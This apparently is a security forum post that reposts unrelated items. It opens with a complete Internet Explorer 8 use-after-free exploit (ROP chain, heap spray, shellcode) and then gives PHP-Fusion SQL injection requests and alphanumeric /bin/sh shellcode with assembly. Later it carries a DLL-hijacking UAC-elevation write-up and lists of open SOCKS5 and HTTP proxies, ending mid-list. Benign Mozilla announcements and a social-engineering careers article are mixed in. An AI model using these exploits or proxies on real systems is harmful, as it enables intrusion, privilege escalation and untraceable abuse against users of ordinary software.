Nytro

[h=1]Internet Explorer 8 MS14-035 Use-After-Free Exploit[/h] <!-- Exploit Title: MS14-035 Use-after-free Exploit for IE8 Date: 10 Nov 2014 Exploit Author: Ayman Sagy <aymansagy@gmail.com> https://www.linkedin.com/in/aymansagy Tested on: IE8 with Java6 on Windows7 --> <html> <head><title>MS14-035 IE8 Use-after-free Exploit</title></head> <body> <!-- <APPLET id="dummy" code="dummy.class" width=100 height=100> You need to install Java to view this page. </APPLET> --> <div id="mydiv">x</div> <form id="frm"></form> <div id="sprayfrm"></div> <script type="text/javascript"> spraysize = 5000; sprayelement = document.getElementById("sprayfrm"); sprayelement.style.cssText = "display:none"; var data; offset = 0x506; buffer = unescape("%u2020%u2020"); pivot = unescape("%u8b05%u7c34"); // stack pivot // MSVCR71 rop = unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret; rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2} rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect rop += unescape("%u5645%u7c36"); // pop esi;ret; rop += unescape("%u5243%u7c34"); // ret; rop += unescape("%u8f46%u7c34"); // pop ebp;ret; rop += unescape("%u87ec%u7c34"); // call eax; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ufdff%uffff"); // {size} rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size} rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx} rop += unescape("%u39fa%u7c34"); // pop edx;ret; rop += unescape("%uffc0%uffff"); // {flag} rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag} rop += unescape("%u4648%u7c35"); // pop edi;ret; rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment} rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret; rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret; rop += unescape("%u683f%u7c36"); // push esp;ret; rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010 // calc shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163"); /* _______0x1cc_____ | | \|/ | Junk ROP Shellcode Pivot Junk 2 3 1 */ while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34"); buffer += rop; buffer += shellcode; while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34"); while (buffer.length < 0x1000) buffer += buffer; data = buffer.substring(0,offset) + pivot + rop + shellcode data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length); while (data.length < 0x80000) data += data; for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS { var obj = document.createElement("button"); obj.title = data.substring(0,0x40000-0x58); //obj.style.fontFamily = data.substring(0,0x40000-0x58); sprayelement.appendChild(obj); } block = unescape( // Literal string to avoid heap allocation "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"); blocks = new Array(); for (i = 0; i < spraysize; i++) { // spray 1 blocks.push(document.createElement("button")); blocks[i].setAttribute("title",block.substring(0, block.length)); sprayelement.appendChild(blocks[i]); } for (i = spraysize/2; i < spraysize; i++) { // free some blocks blocks[i].setAttribute("title",""); } var newdiv = document.createElement('div'); newdiv.innerHTML = "<textarea id='CTextArea'></textarea>"; document.getElementById("frm").appendChild(newdiv); var newdiv2 = document.createElement('div'); newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>"; document.getElementById("frm").appendChild(newdiv2); document.getElementById("CInput").checked = true; trigger = true; document.getElementById("frm").reset(); function crash() { if (trigger) { document.getElementById("frm").innerHTML = ""; // Free object, trigger bug CollectGarbage(); for (i = spraysize/2; i < spraysize; i++) { // spray 2 blocks[i].setAttribute("title",block.substring(0, block.length)); } } } </script> </body> </html> Sursa: http://www.exploit-db.com/exploits/35213/

[h=1]PHP-Fusion 7.02.07 - SQL Injection[/h] # Exploit Title: PHP-Fusion 7.02.07 SQL Injection # Date: 06/11/2014 # Exploit Author: Mauricio Correa # Vendor Homepage: www.php-fusion.co.uk # Software Link: http://ufpr.dl.sourceforge.net/project/php-fusion/PHP-Fusion%20Archives/7.x/ PHP-Fusion-7.02.07.zip # Version: 7.02.07 # Tested on: Linux OS (Debian) # CVE : CVE-2014-8596 GET /PHP-Fusion/files/administration/submissions.php?action=2&aid=9b23a9871adc75 cd&submit_id=1[SQL Injection]&t=n HTTP/1.1 Host: 192.168.0.105 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620 b17122152bf157283f; fusion68fF5_lastvisit=1414550801; session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9; fusion68fF5_visited=yes; has_js=1; Connection: keep-alive and GET /PHP-Fusion/files/administration/members.php?aid=9b23a9871adc75cd&status=4[S QL Injection] HTTP/1.1 Host: 192.168.0.105 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620 b17122152bf157283f; fusion68fF5_lastvisit=1414550801; session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9;; fusion68fF5_visited=yes; has_js=1; Connection: keep-alive More informations (in Portuguese Br): https://www.xlabs.com.br/blog/?p=282 Sursa: http://www.exploit-db.com/exploits/35206/

[h=1]Introducing Polaris Privacy Initiative to Accelerate User-focused Privacy Online[/h]Denelle Dixon-Thayer At Mozilla, we believe that an individuals’ privacy on the Internet cannot be treated as optional. Our Privacy Principles guide us with the design of each of our products and services. We’ve introduced features to support our privacy focus across desktop and mobile, including: an add-on platform with Firefox Add-ons like LightBeam, Ghostery and Privacy Badger; the Do Not Track preference; Private and Guest Browsing; high levels of encryption with Firefox Sync; an individual approach to apps permissions; and even a new Forget button. But we recognize we need to do better and do more. We want to give our users the Web experience they want through features that create transparency and control. We want our users to trust us and the Web. In October 2014, Harris Poll conducted a global online survey* on behalf of Mozilla of more than 7,000 online adults ages 18-64. Three quarters (74%) of people feel their personal information on the Web is less private today than it was one year ago. That same figure of adults agree that Internet companies know too much about them. We think we can help with this concern. Today, we are excited to announce a new strategic initiative at Mozilla called Polaris. Polaris is a privacy initiative built to pull together our own privacy efforts along with other privacy leaders in the industry. Polaris is designed to allow us to collaborate more effectively, more explicitly and more directly to bring more privacy features into our products. We want to accelerate pragmatic and user-focused advances in privacy technology for the Web, giving users more control, awareness and protection in their Web experiences. We want to advance the state of the art in privacy features, with a specific focus on bringing them to more mainstream audiences. We’re joined at launch by the Center for Democracy & Technology (CDT), and the Tor Project both non-profits, who will support and advise Polaris projects and help us align them with policy goals. We believe that the support and assistance from each of these groups is crucial. “CDT looks forward to working with Mozilla on the Polaris program and advising on issues like combating Internet censorship and protecting online anonymity, which are vital to promoting free expression online.” said Justin Brookman of CDT. Not only will these collaborations hold us accountable to staying true to our goal of getting new and innovative privacy features into our general release products, the diversity of understanding, focus and opinion will improve what we bring to the mainstream. Today we’re announcing two experiments under the Polaris banner, focused on anti-censorship technology, anonymity, and cross-site tracking protection. First, Mozilla engineers are evaluating the Tor Project’s changes to Firefox, to determine if changes to our own platform codebase can enable Tor to work more quickly and easily. Mozilla will also soon begin hosting our own high-capacity Tor middle relays to make Tor’s network more responsive and allow Tor to serve more users. “The Tor Project is excited to join Mozilla as a launch partner in the Polaris program. We look forward to working together on privacy technology, open standards, and future product collaborations,” said Andrew Lewman of the Tor Project. The second experiment (which is our first in-product Polaris experiment) seeks to understand how we can offer a feature that protects those users that want to be free from invasive tracking without penalizing advertisers and content sites that respect a user’s preferences. We’re currently testing this privacy tool in our “Nightly” channel. The experiment is promising, but it’s not a full-fledged feature yet. We’ll test and refine the user experience and platform behavior over the coming months and collect feedback from all sides before this is added to our general release versions. We recognize that privacy is not just a functionality on your computer or a setting you can turn on or off, and we’re excited to see what we can do to advance privacy online with Polaris. To learn more or to join us, visit the wiki. *Survey Methodology This survey was conducted online within Great Britain, France, Spain, German, Brazil, and India between October 22nd and 29th, 2014 among 7,077 adults (aged 18-64) by Harris Poll on behalf of Mozilla via its Global Omnibus product. Figures for age, sex, race/ethnicity, education, region and household income were weighted where necessary to bring them into line with their actual proportions in the population. Where appropriate, this data were also weighted to reflect the composition of the adult online population. For complete survey methodology, including weighting variables, please contact press@mozilla.com Sursa: https://blog.mozilla.org/privacy/2014/11/10/introducing-polaris-privacy-initiative-to-accelerate-user-focused-privacy-online/

How To Become a Social Engineer November 10, 2014 I really must admit that one of the most asked questions we get through the website is something like, “I really want to get into social engineering as a career, what should I read/take in college to give me the best chance?” then followed up by “How do I get into this as a job/career?” It is a serious question that we have spent considerable time trying to come with an appropriate answer for. This month I will answer the education piece, by telling you my own thoughts, what I look for when I hire and also what some of my most trusted friends from large companies look for when hiring. Then next month, I will go into how to make this your career. So you wanna be a social engineer? I understand why the question comes in so often. This job is pretty cool sounding. We get paid to phish, vish and break into companies every day. That certainly sounds like the dream job – well at least for a lot of us. Like most careers, it is logical to think that there may be a clear path to education to help you with a leg up in this field. Some people ask me, if they should study psychology, if they should get sales experience, others wonder if they should skip school all together. What’s the answer? Let’s first ask my good friend Jim. He manages a large team of pentesters that includes red teams, social engineers and some excellent hackers at one of the world’s largest financial institutions. I asked him this question, “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester what do you look for? Education, experience or a combination?” Jim says, “First of all I look for experience. But there are certifications that mean something to me like Offensive Security’s certifications (OSCP / OSCE) and the CISSP. In addition, my mantra is generally: Jack-of-all-trades, master of a couple. I look for folks who have a fairly broad generalist experience, but have taken an interest in deeply diving into one or two. I also look for mentality; can the candidate think like a bad guy? Is security your job, or a passion? What does your home network look like? And very importantly, does the candidate have the ability to communicate clearly, concisely, and professionally. Finally, personal references are good, especially when it comes to character, since if you join my team you’re going to have to be a highly trusted individual.” Thanks Jim, that was very helpful. I went another very close friend who has been in the industry for a very long time helping run Black Hat and now running the Global Education and Training practice at Accuvant, Ping Look. Jim, “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester what do you look for? Education, experience or a combination?” Ping said, “Accuvant does not look for degrees – experience and ability to pass the practical exams that we administer and references, especially industry ones, are more important. I know that most hacker’s goals aren’t to be promoted to management but the reality is that everyone has to make a living and having more responsibility within a company usually means a promotion whether it be to management or not. I do know from anecdotal experience of others that at a lot of larger firms, not having a college degree will make it more difficult to be promoted (initially) to management positions. HOWEVER in a technical field, smart companies know that InfoSec is still an emerging marketplace and that finding a candidate with a college degree, especially in computer science who is also a good infosec practitioner with the necessary experience will be very difficult. Over time, those who prove themselves technically adept and have good management chops end up having the same chance in getting promotions or running teams or being lead technologist or chief research scientist as the guy with a degree.” Another excellent answer, that really helps us to get a clear picture. Finally, I went to my good friend, Dave Kennedy. Dave started his own company just a few years ago, Trusted Sec, and went from just a couple people to over 20 people. He obviously knows a thing or two about hiring pentesters. So I presented him with the same question, “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester what do you look for? Education, experience or a combination?” Dave said, “I favor experience over education any day. Although a college degree is important, I am looking for someone who has the experience to handle the type of work that we get. References are important, but I tend to hire people I’ve known and trust in the industry so I always get individuals I know and trust to do the work.” All three answers really paint a great picture for anyone thinking and asking. What about Social-Engineer, Inc? My company has personally grown over the last couple years so I have had to spend considerable time thinking about what it is that I need in employees. Unlike some of the great minds I asked above, my needs are a tad bit different. But let me pick out the similarities from what we saw above: Experience always wins. Many of my team have degrees, and some, like Michele are not only highly educated but trained educators. Even with that, experience is king. Now with that said there aren’t just slews of people that have tons of experience in phishing, vishing and breaking into buildings without having a criminal record. I will discuss later how we get around this particular hurdle in a bit. Mentality: This is a big one because there are many components to this particular topic. Can the person think like a bad guy? We have a motto in my company, “Always leave them feeling better for having met you.” We apply that to how we want our customers to feel about our services. So although I need my people to be able to THINK like a bad guy, I need them to care enough about the customer that they don’t revel in the bad side too long. Desire to learn. We are in a constant state of growth, and part of that is learning how to adapt when the times, attack vectors and methods of the bad guys change. My team has to be willing to do that. Learn from failure. I have failed so many times I can’t count them, but the important part is learning from each failure. My team has to be willing to have the same attitude. Is this a hobby or a passion? It is important to me to find people who enjoy the work and don’t just look at it as a “job”. [*]Performance based education. Right now from what I found, Social-Engineer has the only performance based SE Certification around. I also favor the Offensive Security Certifications as they prove fortitude, persistence and critical thinking skills. [*]Critical thinkers. Probably one of the most important aspects of being a social engineer is being able to critically think. To adapt, flex and change your methods on the fly. To be able to think outside the box, as if there is no box. [*]Willingness to try new things. Many times my team will be required to try completely new things, new pretexts, new methodologies and new processes. Does this mean that education is completely useless? No, not at all. Depending on the role we are looking for a degree can definitely add to usefulness and the position we use the person for. If you are going to college already and you are thinking of a career in pentesting and maybe even social engineering, then there are some areas of study that can help. Things like computer sciences, psychology and social psychology can all help. Of course, we think everyone who wants to be a social engineer should take our 5-day “Advanced Practical Social Engineering” course too. In the end, the fortitude to stick through college, study hard and graduate with good grades can tell a potential employer that you have some great qualities to make a good employee. In the end of the day, social engineering is an exciting and very rewarding career path. Study hard, stay out of trouble and get practical experience where you can and it may just be your career someday too. Next month we will discuss the HOW… till then, stay safe. - See more at: http://www.social-engineer.org/newsletter/social-engineer-newsletter-vol-05-issue-61 Sursa: How To Become a Social Engineer | Christopher Hadnagy | LinkedIn

Mozilla Introduces the First Browser Built For Developers: Firefox Developer Edition on November 10, 2014 by Dave Camp Developers are critical to the continued success of the Web. The content and apps they create compel us to come back to the Web every day, whether on a computer or mobile phone. In celebration of the 10th anniversary of Firefox, we’re excited to unveil Firefox Developer Edition, the first browser created specifically for developers. Ten years ago, we built Firefox for early adopters and developers to give them more choice and control. Firefox integrated WebAPIs and Add-ons to enable people to get the most out of the Web. Now we’re giving developers the whole browser as a hard-hat area, allowing us to bring front and center the features most relevant to them. Having a dedicated developer browser means we can tailor the browsing experience to what developers do every day. Because Firefox is part of an open-source, independent community and not part of a proprietary ecosystem, we’re able to offer features other browsers can’t by applying our tools everywhere the Web goes, regardless of platform or device. One of the biggest pain points for developers is having to use numerous siloed development environments in order to create engaging content or for targeting different app stores. For these reasons, developers often end up having to bounce between different platforms and browsers, which decreases productivity and causes frustration. Firefox Developer Edition solves this problem by creating a focal point to streamline your development workflow. It’s a stable developer browser which is not only a powerful authoring tool but also robust enough for everyday browsing. It also adds new features that simplify the process of building for the entire Web, whether targeting mobile or desktop across many different platforms. If you’re an experienced developer, you’ll already be familiar with the installed tools so you can focus on developing your content or app as soon as you open the browser. There’s no need to download additional plugins or applications to debug mobile devices. If you’re a new Web developer, the streamlined workflow and the fact that everything is already set up and ready to go makes it easier to get started building sophisticated applications. So what’s under the hood? The first thing you’ll notice is the distinctive dark design running through the browser. We applied the developer tools theme to the entire browser. It’s trim and sharp and focused on saving space for the content on your screen. It also fits in with the darker look common among creative app development tools. We’ve also integrated two powerful new features, Valence and WebIDE that improve workflow and help you debug other browsers and apps directly from within Firefox Developer Edition. Valence (previously called Firefox Tools Adapter) lets you develop and debug your app across multiple browsers and devices by connecting the Firefox dev tools to other major browser engines. Valence also extends the awesome tools we’ve built to debug Firefox OS and Firefox for Android to the other major mobile browsers including Chrome on Android and Safari on iOS. So far these tools include our Inspector, Debugger and Console and Style Editor. WebIDE allows you to develop, deploy and debug Web apps directly in your browser, or on a Firefox OS device. It lets you create a new Firefox OS app (which is just a web app) from a template, or open up the code of an existing app. From there you can edit the app’s files. It’s one click to run the app in a simulator and one more to debug it with the developer tools. Firefox Developer Edition also includes all the tools experienced Web developers are familiar with, including: Responsive Design Mode – see how your website or Web app will look on different screen sizes without changing the size of your browser window. Page Inspector- examine the HTML and CSS of any Web page and easily modify the structure and layout of a page. Web Console – see logged information associated with a Web page and use Web Console and interact with a Web page using JavaScript. JavaScript Debugger – step through JavaScript code and examine or modify its state to help track down bugs. Network Monitor – see all the network requests your browser makes, how long each request takes and details of each request. Style Editor – view and edit CSS styles associated with a Web page, create new ones and apply existing CSS stylesheets to any page. Web Audio Editor – inspect and interact with Web Audio API in real time to ensure that all audio nodes are connected in the way you expect. Give it a try and let us know what you think. We’re keen to hear your feedback. More Information: Download Firefox Developer Edition Release Notes Sursa: https://hacks.mozilla.org/2014/11/mozilla-introduces-the-first-browser-built-for-developers-firefox-developer-edition/

[h=1]Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)[/h] #Title: Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes) #Author: Breaking.Technology #Date: 06 November 2014 #Vendor Homepage: http://breaking.technology #Version: x86-64 platforms #Classification: 64 bit shellcode #Shellcode: http://breaking.technology/shellcode/alpha64-binsh.txt # Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes) # This shellcode will successfully execute every time as long as it is returned to. # (c) 2014 Breaking Technology, Inc. # http://breaking.technology/ # # Assembled (87 bytes): # XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V # # Assembly: # user@host $ as alpha64-binsh.s -o alpha64-binsh.o ; strings alpha64-binsh.o .section .data .section .text .globl _start _start: # "XX" pop %rax # 'X' add $0x8, %rsp ; so we dont overwrite the return pointer pop %rax # 'X' add $0x8, %rsp ; so we dont overwrite the return pointer prepare_ff: # "j0TYX45Pk13" push $0x30 # 'j0' push %rsp # 'T' pop %rcx # 'Y' %rcx points to $0x30 pop %rax # 'X' %rax = 0x30 xor $0x35, %al # '45' %rax = 0x05 push %rax # 'P' (%rcx) = 0x05 imul $0x33, (%rcx), %esi # 'k13' %esi = 0x000000ff prepare_f8: # "VX4047" # mov %rsi, %rax push %rsi # 'V' pop %rax # 'X' %rax = %rsi = 0x000000ff # mov $0xf8, %al xor $0x30, %al # '40' xor $0x37, %al # '47' %rax = 0x000000f8 write_negative_8: # "3At1At1qu1qv1qw" # mov %eax, 0x74(%rcx) xor 0x74(%rcx), %eax # '3At' xor %eax, 0x74(%rcx) # '1At' 0xf8 # mov %sil, 0x75 - 0x77 + rcx xor %esi, 0x75(%rcx) # '1qu' 0xff xor %esi, 0x76(%rcx) # '1qv' 0xff xor %esi, 0x77(%rcx) # '1qw' 0xff # -8 is now on the stack as a 32-bit dword # at 0x74(%rcx) read_negative_8: # "Hcyt" # move long (dword) to signed quadword # mov -8, %rdi movslq 0x74(%rcx), %rdi # 'Hcyt' %rdi is now -0x8 ( 0xfffffffffffffff8 ) get_return_pointer: # "14yH34y" # mov -0x10(%rcx), %rsi <--- THIS IS OUR RETURN POINTER / LOCATION OF short_pc_rsi # OR IN DECIMAL: # mov -16(%rcx), %rsi xor %esi, (%rcx, %rdi, 2) # '14y' xor (%rcx, %rdi, 2), %rsi # 'H34y' prepare_key: # "hj5XVX" # put the xor key into %eax push $0x5658356a # 'hj5XV' pushed backwards because x86 stack. pop %rax # 'X' decode_encoded_code: # "1FK" xor %eax, 0x4b(%rsi) # '1FK' encoded_code ; pops & syscall decoded decode_encoded_data: # "1FSH3FO" xor %eax, 0x53(%rsi) # '1FS' encoded_data + 4 ; "/sh\0" decoded xor 0x4f(%rsi), %rax # 'H3FO' encoded_data ; "/bin/sh\0" now in %rax begin_stack_setup: # "PT" push %rax # 'P' push "/bin/sh\0" push %rsp # 'T' push pointer to /bin/sh zero_rax: # "j0X40" # xor %rax, %rax push $0x30 # 'j0' pop %rax # 'X' xor $0x30, %al # '40' %rax is NULL end_stack_setup: # "PP" push %rax # 'P' push NULL push %rax # 'P' push NULL mov_3b_al: # "4u4N" # mov $0x3b, %al xor $0x75, %al # '4u' xor $0x4e, %al # '4N' %al = 0x4e xor 0x75 = $0x3b # this is for syscall ^ begin_stack_run: # "Z" pop %rdx # 'Z' mov $0x00, %rdx ; %rdx = NULL encoded_code: # "4jWS" # 0x34 0x6a 0x57 0x53 # AFTER XOR MAGIC: .byte 0x34 # "\x5e" pop %rsi ; %rsi = NULL .byte 0x6a # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0" .byte 0x57 # "\x0f" .byte 0x53 # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL); # syscall(%rax) = function(%rdi,%rsi,%rdx); # syscall(0x3b) = execve("/bin/sh\0",NULL,NULL); encoded_data: # "EW18EF0V" turns into "/bin/sh\0" # 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56 # AFTER XOR MAGIC: .byte 0x45 # / .byte 0x57 # b .byte 0x31 # i .byte 0x38 # n .byte 0x45 # / .byte 0x46 # s .byte 0x30 # h .byte 0x56 # \0 Sursa: http://www.exploit-db.com/exploits/35205/

[h=1]KdExploitMe[/h] A kernel driver to practice writing exploits against, as well as some example exploits using public techniques. Sursa: https://github.com/clymb3r/KdExploitMe

[h=3]Passive UAC Elevation[/h] I had a cool idea for a way to get the user to passively elevate your application without socially engineering them to do so or requiring exploits. Obviously you could just go ahead and start mass infecting executables, but that would cause a lot of unforeseen problems and would also mean digitally signed applications from trusted providers would now appear as untrusted files. A good alternative would be hijacking a single dll. [h=2]LoadLibrary[/h] This is something most people should already know, but I'll go ahead and clarify for anyone that doesn't. When an application calls LoadLibrary on a dll but doesn't supply the full path to the file: The system will first check the KnownDlls registry key for the path, if it's not found there, then the system will the look in the directory the application was executed from, before finally looking in system paths such as system32/syswow64. If you were to write a dll to the same path as an application and give it the same name as a commonly loaded system dll, it would likely be loaded by the application instead of the real thing; However, the dll must meet the following criteria. The application must load the dll by its name and not the full path (this is common). The dll must not exist in HKLM\SYSTEM\Control\Session Manager\KnownDLLs. The dll must match the process architecture (64-bit processes will quietly skip 32-bit dlls and vice versa). The dll should exist in system32 or syswow64, special paths don't appear to work. ZeroAccess abused this method to "social engineer" the user into elevating the file. This was done by downloading the Adobe Flash installer from the official site, writing the bot's dll to the same path as the installer, then running it. When the installer was executed, the UAC popup would state that the application was from a verified publisher "Adobe Systems Incorporated" and the user would probably allow it to elevate (resulting in the elevated installer loading the bot's malicious dll). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Is it a real flash update? Is it just ZeroAccess? Nobody know.[/TD] [/TR] [/TABLE] [h=2]A Less Invasive Method[/h] What if there was a folder where 90% of the applications that require UAC elevation reside and what if it was writable from a non-elevated process? Well it turns out that folder exists: say hello to %userprofile%\Downloads\. You can probably see where I'm going with this. Although I wasn't expecting to find a dll that is loaded by most applications and meets all the criteria for a hijackable dll, after about 5 minutes of searching I found the motherload: dwmapi.dll. Not only does this dll meet all the criteria, but it appears to be loaded by all setup files... So let's make a hello world dll, name it dwmapi.dll, drop it to the downloads folder, and run a setup file. Success! The only problem here is that as soon as we start the setup it'll crash because we've replaced an important dll, however this is a fairly easy fix: dll infection. [h=2]Writing a DLL Infector[/h] My first idea was to simply add a new section header, change the NumberOfSections field in the PE header, then just append my section on to the end of the PE file. As it happens, directly after the last section header is the bound imports directory, which would be overwritten by our new section header. So after about 2 hours of writing an application to rebuild the entire PE from scratch, someone reminded me that the bound imports directory is just there to speed up the loading of imports and can simply be overwritten then disabled in the PE header. Following 15 minutes of holding CTRL + Z, I'm back to where I started and feeling a bit silly. An additional 2 lines of code has my infector working perfectly and we're ready to move on to the next step. The current infector simply disable and overwrite the bound imports directory with the new section header, append the new section to the end of the PE file, adjusts the SizeOfImage to accommodate the new section, then changes the AddressOfEntryPoint to point to our new section. All we need now is some code for the section. [h=2]The Shellcode[/h] The obvious choice was the make the new section execute shellcode so we don't have to worry about relocations or imports. The actual code is pretty simple and written using some handy FASM macros, I'll quickly run over how it works. Checks the stack to make sure that dwmapi.dll was called with DLL_PROCESS_ATTACH Navigates the PEB Ldr structure to get the base address of Kernel32 and Ntdll. Usess a simple GetProcAddress implementation to import the following functions: NtOpenProcessToken, NtQueryInformationToken, NtClose, ExpandEnvironmentStringsA, CreateProcessA. Opens the current process token and queries it to confirm the application we are running from is UAC elevated. Gets the path of cmd.exe then executes it (UAC elevated of course). Passes execution back to the real dwmapi.dll entry point so execution can continue. [h=2]Putting It All Together[/h] The final product infects dwmapi.dll with our shellcode and places it in the download folder, once the user downloads and runs a setup that requires UAC elevation, our elevated command prompt will be spawned ( Because of Wow64FsRedirect and the fact that most setups run under wow64, we can use the same code on 32-bit and 64-bit windows). I've uploaded the full infector and shellcode source to my github: https://github.com/MalwareTech/UACElevator Posted by TM at 11:03 AM Sursa: MalwareTech: Passive UAC Elevation

[h=1]08-11-14 | VIP Socks 5 (62)[/h] [LIST=1]08-11-14 | VIP Socks 5 (62) Checked & filtered Socks5: 107.185.202.211:47603 108.162.40.186:52707 109.201.254.216:27976 122.221.158.15:31978 135.19.61.219:19291 142.196.192.133:18215 173.163.56.233:36847 173.217.23.79:41406 174.1.13.143:32726 174.55.203.55:26215 174.60.73.244:37761 180.64.68.40:443 184.166.178.229:30957 184.68.38.126:16444 194.44.175.41:1081 194.44.175.49:1081 198.27.67.24:53193 198.50.206.1:443 199.201.126.163:443 201.211.174.68:17195 202.154.102.12:20669 205.144.214.26:17232 216.171.240.92:1053 216.240.53.99:29059 222.114.148.54:443 23.106.90.230:11973 24.15.203.60:28655 24.192.152.155:15975 24.210.225.114:10557 24.49.210.53:48659 24.51.216.43:51039 24.59.45.242:15310 24.93.123.61:23183 31.129.91.129:33335 47.22.36.178:32754 5.11.76.183:36209 61.147.67.2:9123 66.168.209.178:20700 67.183.10.14:5105 68.225.150.49:7733 69.116.206.228:33198 70.126.76.45:32973 70.33.46.92:52784 70.64.144.216:46069 71.225.92.117:37467 71.9.127.141:36820 72.192.18.107:46478 74.132.8.66:29734 75.71.170.182:33683 75.84.52.36:43440 76.173.39.152:53356 78.237.248.24:17909 78.39.178.2:443 80.46.160.219:25712 80.47.184.124:49168 85.30.233.152:4013 89.44.109.160:13135 92.240.248.75:443 96.29.132.66:18433 96.3.48.98:24257 98.235.80.130:22831 99.229.170.129:41438 [/LIST] Sursa: 08-11-14 | VIP Socks 5 (62) - Pastebin.com

08-11-14 | Fast Proxy Server List (1655) [LIST=1]08-11-14 | Fast Proxy Server List (1655) Checked & filtered verified L1/L2/L3 HTTP Proxies (Timeout 3) 1.160.80.14:8088 1.161.212.57:80 1.161.212.57:8080 1.164.212.237:8088 1.164.227.161:8088 1.168.89.87:8088 1.171.1.145:9064 1.172.2.142:9064 1.179.147.2:8080 1.192.116.28:8585 101.251.238.123:8080 101.69.168.210:9000 101.69.168.211:9000 101.79.246.16:8080 101.79.246.6:8080 103.16.114.11:3128 103.21.184.209:9064 103.246.244.161:44338 103.249.181.5:3128 103.25.155.51:8080 103.25.203.227:7808 103.25.203.227:8089 103.25.7.51:9064 103.254.126.38:80 103.254.126.38:8080 103.255.121.195:80 103.28.158.41:9064 103.28.255.90:9064 103.31.133.226:3128 103.4.167.186:80 106.3.40.249:8081 106.37.177.251:3128 107.150.224.29:80 107.150.224.29:8080 107.170.206.99:80 108.165.33.11:3128 108.165.33.3:3128 108.165.33.4:3128 108.165.33.7:3128 108.165.33.9:3128 108.47.12.2:8081 109.120.150.87:3128 109.228.25.136:80 109.251.10.3:8080 109.73.170.248:80 110.153.9.250:80 110.252.17.176:8585 110.4.12.173:80 110.4.12.175:80 110.4.12.176:80 110.4.12.178:80 110.4.24.176:80 110.4.24.178:80 110.54.224.226:8080 110.77.197.156:3128 110.77.212.109:8080 111.1.3.38:8000 111.1.32.122:81 111.1.32.20:8085 111.1.32.20:8088 111.1.32.20:8888 111.1.32.21:81 111.1.32.21:86 111.1.32.22:81 111.1.32.22:86 111.1.32.23:85 111.1.32.24:3128 111.1.32.24:8080 111.1.32.24:8088 111.1.32.24:81 111.1.32.24:8123 